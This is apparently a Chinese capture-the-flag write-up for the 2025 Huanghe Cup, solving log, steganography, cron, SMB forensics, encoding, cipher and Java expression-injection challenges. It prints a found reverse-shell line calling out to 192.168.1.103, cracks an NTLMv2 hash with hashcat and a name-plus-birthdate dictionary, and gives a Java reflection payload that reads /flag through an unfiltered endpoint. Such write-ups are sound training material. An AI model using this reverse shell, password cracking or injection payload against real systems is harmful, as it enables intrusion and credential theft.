2025黄鹤杯WP



easylog

搜索flag发现攻击者ip,筛选ip获取flag

flag{9780f373-8ac1-4a14-ac85-c490147a7285}

landscape

题目:

解题:

转换为.bin

from PIL import Image            

def extract_lsb(image_path, output_file):            
    img = Image.open(image_path)            
    width, height = img.size            
    pixels = img.load()            
    
    binary_data = ”            
    byte = 0            
    bit_count = 0            
    
    for y in range(height):            
        for x in range(width):            
            r, g, b = pixels[x, y]            
            
            # 提取每个颜色通道的最低位            
            binary_data += str(r & 1)            
            binary_data += str(g & 1)            
            binary_data += str(b & 1)            
    
    # 将二进制数据转换为字节            
    bytes_data = bytearray()            
    for i in range(0, len(binary_data), 8):            
        byte = binary_data[i:i+8]            
        if len(byte) < 8:            
            break            
        bytes_data.append(int(byte, 2))            
    
    # 保存提取的内容            
    with open(output_file, ‘wb’) as f:            
        f.write(bytes_data)            
    
    print(f’LSB提取完成,结果保存至: {output_file}’)            

# 执行提取            
extract_lsb(‘landscape.bmp’, ‘lsb_extracted.bin’)            

执行提取

extract_lsb(‘landscape.bmp’, ‘lsb_extracted.bin’)


└─# strings lsb_extracted.bin  | grep flag            
42:flag{1f078251-aaf6-6237-a0ce-f420d9e2c99a}            

cron


root@d8e7f18325b6:~# ps  -ef            
UID        PID  PPID  C STIME TTY          TIME CMD            
root         1     0  0 03:03 pts/0    00:00:00 /bin/bash /root/start.sh            
root        24     1  0 03:03 ?        00:00:00 /usr/sbin/sshd            
root        27     1  0 03:03 pts/0    00:00:00 tail -f /dev/null            
root        28    24  0 03:04 ?        00:00:00 sshd: [accepted]            
sshd        29    28  0 03:04 ?        00:00:00 sshd: [net]            
root        30    24  0 03:04 ?        00:00:00 sshd: root@pts/1            
root        41    24  0 03:05 ?        00:00:00 sshd: root@notty            
root        52    41  0 03:05 ?        00:00:00 /usr/lib/openssh/sftp-server            
root        53    30  0 03:05 pts/1    00:00:00 -bash            
root        61    53  0 03:05 pts/1    00:00:00 ps -ef            
root@d8e7f18325b6:~# crontab  -l            

2025黄鹤杯部分WP
* * * * * /usr/local/etc/cron_script.sh >> /var/log/cron.log 2>&1            
root@d8e7f18325b6:~# cat /var/log/cron.log            
cat: /var/log/cron.log: No such file or directory            
root@d8e7f18325b6:~# cat  /var/log/cron.log            
cat: /var/log/cron.log: No such file or directory            
root@d8e7f18325b6:~# cat  /var/log/cron.log^C            
root@d8e7f18325b6:~# cat /usr/local/etc/cron_script.sh            
#!/bin/bash            
bash -i >& /dev/tcp/192.168.1.103/8888 0>&1            
FLAG=flag{1j4h21u18tj0qm028bv3iv3kpjtj3u48}            


应急流量分析

题目:

在某次攻防演练行动中集团内网系统被攻破,系统里面的重要文件被窃取。应急人员在溯源的时候发现是因为内网系统运维人员安全意识不足,使用姓名+出生年月日设置密码(例如:zhangsan19900421),集团通讯录被泄露导致攻击者利用通讯录构造社工字典,然后爆破密码,登录之后窃取重要文件,并利用隧道技术进行隐蔽通信。技术人员在安全设备上将流量下载下来了,请你帮助分析,泄露的smb服务密码以及隧道技术外传文件中隐藏的隐秘数据。flag格式:flag{md5(泄露的smb服务密码+外传文件中隐藏的隐秘数据)} 例如: 泄露的smb服务密码:admin123 外传文件中隐藏的隐秘数据:secretABC md5(admin123secretABC)=64b28055baab305b9f4ed6881ee4dc23 flag为:flag{64b28055baab305b9f4ed6881ee4dc23}

smb认证成功信息数据包

识别并提取NTLMv2响应,拼接

username::domain:server_challenge:ntlmv2_response:proof_str

最后一个要右键复制值

administrator::.:853d0c9596a21a7f:79dd4eb4c0218510e8f3a2e20cb159b801010000000000006a4b2c83eccfdb01aa3bedd848e18c190000000002001e00570049004e002d00420041004b004400480051003100390039003300550001001e00570049004e002d00420041004b004400480051003100390039003300550004001e00570049004e002d00420041004b004400480051003100390039003300550003001e00570049004e002d00420041004b0044004800510031003900390033005500070008006a4b2c83eccfdb01060004000200000008003000300000000000000000000000003000000b700ed8b5587773b9d33ba88d31d76deacb2d647b510c3462734ca561e6ed9f0a001000000000000000000000000000000000000900280063006900660073002f003100390032002e003100360038002e003200310031002e003100340036000000000000000000

组成人名密码字典爆破

jiangyingzhen19800407

caoyiying19870307

dongminfeng19830630

jinai19931203

guoqianpiao19901014

xuanyuanmingqi19890311

shixiaya19950424

liaoqiying19921125

weixuejing19951231

panyaoying19860429

cenghe19850609

…….


└─# hashcat -m 5600   ./hash1.txt ./1.txt  –show            
ADMINISTRATOR::.:853d0c9596a21a7f:79dd4eb4c0218510e8f3a2e20cb159b8:01010000000000006a4b2c83eccfdb01aa3bedd848e18c190000000002001e00570049004e002d00420041004b004400480051003100390039003300550001001e00570049004e002d00420041004b004400480051003100390039003300550004001e00570049004e002d00420041004b004400480051003100390039003300550003001e00570049004e002d00420041004b0044004800510031003900390033005500070008006a4b2c83eccfdb01060004000200000008003000300000000000000000000000003000000b700ed8b5587773b9d33ba88d31d76deacb2d647b510c3462734ca561e6ed9f0a001000000000000000000000000000000000000900280063006900660073002f003100390032002e003100360038002e003200310031002e003100340036000000000000000000:xiexinhuan19850            

获取到人名字xiexinhuan19850

获取隧道技术外传文件中隐藏的隐秘数据

smb2.filename contains ‘.jpg’ or smb2.filename contains ‘.png’

dGgxc19sc19zM2NlcnQ

th1s_ls_s3cert

最终flag

xiexinhuan19850318th1s_ls_s3cert

flag{c1f9558d9d41e88501ecb2074eca186f}

组合拳

题目

3031303130313030203031303130313130203031313130303030203031303131303030203031303130303130203030313130303030203031303031313130203031313030303031203031303031313031203031313131303130203031303031313130203031303031303030203031303130303130203031313031313030203031303130303130203031303030313031203031303130303031203031303130313031203030313130313030203031313131303130203031303130303031203031313031303131203031313030313030203031303130303131203031303130313031203031303130313130203031303130303130203031303031313130203031303130313030203031303030313031203031313131303030203031303030313031203031303130313030203031303130313130203031303130313130203031303131303130203031303130313130203031303030313031203031313130313030203031303031313031203031303130303131203031313031313030203031313030313030203031303031303030203031303130303131203031303130313030203031303130303130203031303030313031203031303130313030203031303130313031203031313131303030203031303031313031203031303130303031203031313031303131203031313030303131203030313130303031203031303130313031203031303130313130203031313030313030203031303030313130203031303130313030203031303030313031203031313130303030203031303130313031203031303130303130203030313130303031203031303130313031203031313131303130203031303130313130203030313130303030203031313031313030203031313030303031203031303130303031203031313031313030203031313030313030203031303031303030203031303130303130203031313031313030203031303031313130203031303031303030203031303130303031203030313130303030203030313131303031203031303031313031203031303130303130203031303130313031203030313130303031203031303130313131203031303031313130203031313031313030203031303030313031203030313131303031203031303130303030203031303130313030203030313130303030203030313131303031

解题:

16进制转字符>2进制转字符>base64解码>base32解码





AD

synt{ilqj3oB8416CXf1o3fLVUSxUz6}

凯撒密码

flag{vydw3bO8416PKs1b3sYIHFkHm6}

Expr

Payload

.class.forName(‘java.nio.file.Files’).readAllLines(.class.forName(‘java.nio.file.Paths’).get(‘/flag’))

Java 表达式注入漏洞分析

/calc 端点接受表达式参数

发现表达式被直接求值执行,没有足够过滤

构造恶意 Java 反射代码读取系统文件